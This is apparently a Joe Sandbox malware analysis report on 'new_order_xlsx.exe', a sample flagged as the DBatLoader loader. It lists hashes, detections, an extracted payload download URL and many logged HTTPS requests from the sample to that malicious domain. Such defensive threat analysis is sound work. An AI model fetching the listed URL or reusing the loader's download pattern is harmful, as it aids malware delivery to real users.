Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new_order_xlsx.exe

Overview

General Information

Sample Name:new_order_xlsx.exe
Analysis ID:1303012
MD5:ef6025979e7e27041ef72650fdbe8630
SHA1:8ac15cf845249b2a7c9c095808153656579b1704
SHA256:5c8d558572c445f5fdadc3758c208654d7dd2787a73a2a1e1757e87dd19d6fad
Tags:exe
Infos:

Detection

DBatLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Initial sample is a PE file and has a suspicious name
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • new_order_xlsx.exe (PID: 6804 cmdline: C:\Users\user\Desktop\new_order_xlsx.exe MD5: EF6025979E7E27041EF72650FDBE8630)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
new_order_xlsx.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.3.new_order_xlsx.exe.23e52ec.123.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      0.3.new_order_xlsx.exe.23e5580.125.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0.3.new_order_xlsx.exe.23e2b58.117.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0.0.new_order_xlsx.exe.400000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            0.3.new_order_xlsx.exe.23e502c.121.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              Click to see the 4 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: new_order_xlsx.exeAvira: detected
              Found malware configuration
              Source: new_order_xlsx.exeMalware Configuration Extractor: DBatLoader {"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}
              Multi AV Scanner detection for submitted file
              Source: new_order_xlsx.exeReversingLabs: Detection: 78%
              Antivirus detection for URL or domain
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfyAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~()Avira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfkAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/LAvira URL Cloud: Label: malware
              Machine Learning detection for sample
              Source: new_order_xlsx.exeJoe Sandbox ML: detected
              Source: new_order_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49739 version: TLS 1.2

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: Joe Sandbox ViewASN Name: GYRONGB GYRONGB
              Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:09 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:19 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:29 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:39 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:49 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:36:59 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:09 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:19 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:30 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:39 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:49 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:37:59 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:09 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:19 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:29 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:39 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:48 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:38:59 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: new_order_xlsx.exe, 00000000.00000002.632330900.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exe
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000086D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000086D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.296724807.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: new_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230388318.00000000023AC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230629064.00000000023E1000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.633865481.0000000003629000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230353890.00000000035EA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230689886.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230595125.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230526584.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230455265.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231207375.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231339439.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230570843.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230792106.0000000002406000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230295494.0000000003514000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231068363.00000000023E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/L
              Source: new_order_xlsx.exe, 00000000.00000002.634603198.0000000009676000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~()
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/l
              Source: unknownDNS traffic detected: queries for: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
